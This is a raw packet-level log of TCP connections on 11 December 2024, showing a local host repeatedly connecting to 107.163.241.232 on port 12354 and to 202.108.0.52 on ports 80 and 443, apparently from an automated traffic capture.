Dec 11, 2024 16:27:52.212766886 CET	50233	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:52.252118111 CET	50247	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:52.373910904 CET	12354	50247	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:52.374027014 CET	50247	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:52.382196903 CET	50247	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:52.501796961 CET	12354	50247	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:52.627547026 CET	50255	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:52.748132944 CET	12354	50255	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:52.748280048 CET	50255	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:52.748363972 CET	50255	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:52.812859058 CET	443	50229	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:52.812937975 CET	443	50229	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:52.812947035 CET	50229	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:52.812983036 CET	50229	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:52.813271999 CET	50229	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:52.813287973 CET	443	50229	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:52.868552923 CET	12354	50255	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:53.086111069 CET	50206	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:53.087337971 CET	50260	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:53.243009090 CET	80	50260	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:53.243338108 CET	50260	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:53.243506908 CET	50260	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:53.243530989 CET	80	50206	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:53.244271040 CET	50206	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:53.365212917 CET	80	50260	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:54.489197016 CET	12354	50247	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:54.489311934 CET	50247	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:54.495433092 CET	50247	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:54.495850086 CET	50279	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:54.614900112 CET	12354	50247	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:54.615217924 CET	12354	50279	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:54.615303993 CET	50279	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:54.615418911 CET	50279	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:54.734834909 CET	12354	50279	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:54.817440033 CET	80	50260	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:54.817496061 CET	50260	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:54.862982988 CET	12354	50255	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:54.863183022 CET	50255	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:54.863183022 CET	50255	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:54.863460064 CET	50285	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:54.982601881 CET	12354	50255	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:54.982724905 CET	12354	50285	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:54.982827902 CET	50285	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:54.991259098 CET	50285	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:54.995402098 CET	50288	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:54.995507956 CET	443	50288	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:54.995615005 CET	50288	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:54.995886087 CET	50288	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:54.995914936 CET	443	50288	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:55.111514091 CET	12354	50285	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:56.260934114 CET	50279	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:56.260935068 CET	50285	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:56.260973930 CET	50288	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:56.356415987 CET	50293	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:56.409533978 CET	50260	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:56.410001040 CET	50294	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:56.472229958 CET	50296	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:56.476793051 CET	12354	50293	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:56.476885080 CET	50293	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:56.477699041 CET	50293	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:56.529526949 CET	80	50260	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:56.529608011 CET	80	50294	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:56.529627085 CET	50260	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:56.529828072 CET	50294	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:56.543292046 CET	50294	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:56.591550112 CET	12354	50296	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:56.591625929 CET	50296	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:56.592231989 CET	50296	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:56.597170115 CET	12354	50293	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:56.670380116 CET	80	50294	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:56.712306976 CET	12354	50296	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:58.102708101 CET	80	50294	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:58.104365110 CET	50294	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:58.137896061 CET	50322	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:58.138000011 CET	443	50322	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:58.138109922 CET	50322	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:58.138384104 CET	50322	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:58.138416052 CET	443	50322	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:58.597690105 CET	12354	50293	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:58.597759008 CET	50293	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:58.706624031 CET	12354	50296	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:58.706758022 CET	50296	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:58.768016100 CET	50293	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:58.768733025 CET	50326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:58.770431042 CET	50296	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:58.887463093 CET	12354	50293	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:58.888020039 CET	12354	50326	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:58.888128042 CET	50326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:58.889734983 CET	12354	50296	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:58.942759037 CET	50326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:59.062041044 CET	12354	50326	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:59.095269918 CET	50328	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:59.214694977 CET	12354	50328	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:59.214807987 CET	50328	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:59.765985012 CET	50328	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:27:59.838385105 CET	443	50322	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:59.838542938 CET	50322	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:59.839035034 CET	443	50322	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:59.839090109 CET	50322	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:59.879236937 CET	50322	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:59.879302025 CET	443	50322	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:59.879676104 CET	443	50322	202.108.0.52	192.168.2.7
Dec 11, 2024 16:27:59.879746914 CET	50322	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:59.880228996 CET	50322	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:27:59.885772943 CET	12354	50328	107.163.241.232	192.168.2.7
Dec 11, 2024 16:27:59.923338890 CET	443	50322	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:00.350745916 CET	50328	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:00.350765944 CET	50326	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:00.350802898 CET	50322	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:00.366940975 CET	50339	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:00.486438990 CET	12354	50339	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:00.486546993 CET	50339	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:00.507483959 CET	50339	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:00.554166079 CET	50294	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:00.554424047 CET	50341	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:00.555600882 CET	50342	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:00.627337933 CET	12354	50339	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:00.674565077 CET	80	50341	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:00.674704075 CET	50341	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:00.674978018 CET	50341	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:00.675261974 CET	80	50294	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:00.675318956 CET	50294	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:00.677426100 CET	12354	50342	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:00.677535057 CET	50342	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:00.677692890 CET	50342	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:00.796979904 CET	80	50341	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:00.800151110 CET	12354	50342	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:02.246408939 CET	80	50341	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:02.246545076 CET	50341	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:02.286566973 CET	50369	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:02.286616087 CET	443	50369	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:02.286675930 CET	50369	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:02.304917097 CET	50369	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:02.304944992 CET	443	50369	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:02.602644920 CET	12354	50339	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:02.602771044 CET	50339	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:02.768378973 CET	50339	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:02.769049883 CET	50371	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:02.792853117 CET	12354	50342	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:02.792913914 CET	50342	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:02.888113022 CET	12354	50339	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:02.888690948 CET	12354	50371	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:02.888798952 CET	50371	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:03.333317995 CET	50342	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:03.335738897 CET	50371	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:03.453809977 CET	12354	50342	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:03.456438065 CET	12354	50371	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:03.514946938 CET	50372	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:03.634927034 CET	12354	50372	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:03.634994030 CET	50372	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:03.696115971 CET	50372	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:03.815392017 CET	12354	50372	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:04.004825115 CET	443	50369	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:04.004961967 CET	50369	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:04.005422115 CET	50369	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:04.005434036 CET	443	50369	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:04.007322073 CET	50369	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:04.007327080 CET	443	50369	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:04.524955988 CET	50372	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:04.524986982 CET	50369	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:04.525019884 CET	50371	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:04.525598049 CET	50390	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:04.645298004 CET	12354	50390	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:04.645375013 CET	50390	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:04.645664930 CET	50390	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:04.688111067 CET	50393	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:04.690068960 CET	50341	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:04.690295935 CET	50394	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:04.765204906 CET	12354	50390	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:04.810961962 CET	12354	50393	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:04.811058998 CET	50393	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:04.811268091 CET	50393	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:04.813061953 CET	80	50394	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:04.813123941 CET	50394	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:04.813244104 CET	50394	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:04.813496113 CET	80	50341	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:04.813540936 CET	50341	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:04.932334900 CET	12354	50393	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:04.933207035 CET	80	50394	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:06.380290031 CET	80	50394	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:06.380429983 CET	50394	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:06.754029989 CET	12354	50390	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:06.754077911 CET	50390	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:06.925374985 CET	12354	50393	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:06.925458908 CET	50393	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:07.037920952 CET	50390	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:07.038603067 CET	50415	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:07.039551973 CET	50393	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:07.165581942 CET	12354	50390	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:07.165605068 CET	12354	50415	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:07.165621996 CET	12354	50393	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:07.165674925 CET	50415	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:07.171730995 CET	50415	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:07.291273117 CET	12354	50415	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:07.320924044 CET	50420	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:07.320955038 CET	443	50420	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:07.321016073 CET	50420	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:07.324193954 CET	50420	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:07.324207067 CET	443	50420	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:07.441711903 CET	50422	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:07.561845064 CET	12354	50422	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:07.561966896 CET	50422	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:07.564228058 CET	50422	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:07.687309980 CET	12354	50422	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:09.027671099 CET	443	50420	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:09.027745962 CET	50420	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:09.028196096 CET	50420	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:09.028203011 CET	443	50420	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:09.029882908 CET	50420	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:09.029889107 CET	443	50420	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:09.316515923 CET	12354	50415	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:09.316693068 CET	50415	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:09.316792011 CET	50415	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:09.317375898 CET	50454	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:09.436116934 CET	12354	50415	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:09.436697960 CET	12354	50454	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:09.436849117 CET	50454	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:09.436985016 CET	50454	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:09.556216955 CET	12354	50454	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:09.706072092 CET	12354	50422	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:09.706197977 CET	50422	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:09.898257017 CET	443	50420	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:09.898364067 CET	50420	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:09.898394108 CET	443	50420	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:09.898408890 CET	443	50420	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:09.898437023 CET	50420	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:09.898467064 CET	50420	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:10.079816103 CET	50422	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:10.080487967 CET	50459	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:10.096081018 CET	50420	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:10.096100092 CET	443	50420	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:10.199637890 CET	12354	50422	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:10.200849056 CET	12354	50459	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:10.200938940 CET	50459	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:10.418580055 CET	50459	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:10.539773941 CET	12354	50459	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:11.119431019 CET	50394	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:11.119702101 CET	50463	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:11.178468943 CET	50454	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:11.178527117 CET	50459	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:11.180237055 CET	50464	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:11.243777990 CET	80	50463	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:11.244128942 CET	80	50394	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:11.244199038 CET	50463	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:11.244210005 CET	50394	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:11.293284893 CET	50467	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:11.300386906 CET	12354	50464	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:11.304338932 CET	50464	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:11.335460901 CET	50464	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:11.412869930 CET	12354	50467	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:11.416403055 CET	50467	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:11.436767101 CET	50467	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:11.454804897 CET	12354	50464	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:11.475914955 CET	50469	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:11.561916113 CET	12354	50467	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:11.600014925 CET	80	50469	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:11.600333929 CET	50469	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:11.600507975 CET	50469	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:11.719779015 CET	80	50469	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:13.170536995 CET	80	50469	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:13.170646906 CET	50469	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:13.195055008 CET	50502	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:13.195086002 CET	443	50502	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:13.195223093 CET	50502	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:13.195434093 CET	50502	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:13.195445061 CET	443	50502	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:13.425513029 CET	12354	50464	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:13.425717115 CET	50464	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:13.462091923 CET	50464	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:13.462719917 CET	50506	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:13.539151907 CET	12354	50467	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:13.539258957 CET	50467	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:13.540285110 CET	50467	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:13.583365917 CET	12354	50464	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:13.583379984 CET	12354	50506	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:13.583497047 CET	50506	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:13.583698988 CET	50506	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:13.589698076 CET	50509	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:13.662710905 CET	12354	50467	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:13.704106092 CET	12354	50506	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:13.712317944 CET	12354	50509	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:13.712377071 CET	50509	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:13.712595940 CET	50509	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:13.832735062 CET	12354	50509	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:14.899705887 CET	443	50502	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:14.899848938 CET	50502	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:14.900819063 CET	50502	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:14.900826931 CET	443	50502	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:14.902601004 CET	50502	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:14.902606964 CET	443	50502	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:15.207628965 CET	50506	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:15.207643986 CET	50509	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:15.207684994 CET	50502	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:15.208168983 CET	50545	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:15.327517986 CET	12354	50545	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:15.327642918 CET	50545	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:15.327974081 CET	50545	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:15.337215900 CET	50549	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:15.339472055 CET	50469	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:15.339706898 CET	50550	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:15.447882891 CET	12354	50545	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:15.456398964 CET	12354	50549	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:15.456510067 CET	50549	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:15.456660032 CET	50549	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:15.458980083 CET	80	50550	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:15.459075928 CET	50550	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:15.459089041 CET	80	50469	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:15.459328890 CET	50550	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:15.460292101 CET	50469	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:15.576030016 CET	12354	50549	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:15.579068899 CET	80	50550	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:17.010035038 CET	80	50550	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:17.010097027 CET	50550	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:17.015650988 CET	50590	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:17.015675068 CET	443	50590	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:17.015738964 CET	50590	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:17.043948889 CET	50590	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:17.043962955 CET	443	50590	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:17.441482067 CET	12354	50545	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:17.441595078 CET	50545	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:17.441683054 CET	50545	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:17.442102909 CET	50599	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:17.561256886 CET	12354	50545	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:17.561662912 CET	12354	50599	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:17.561774015 CET	50599	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:17.565979004 CET	12354	50549	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:17.566055059 CET	50549	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:17.581948042 CET	50599	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:17.582444906 CET	50549	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:17.587733984 CET	50603	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:17.701364040 CET	12354	50599	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:17.701739073 CET	12354	50549	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:17.707047939 CET	12354	50603	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:17.707138062 CET	50603	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:17.708909988 CET	50603	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:17.828232050 CET	12354	50603	107.163.241.232	192.168.2.7
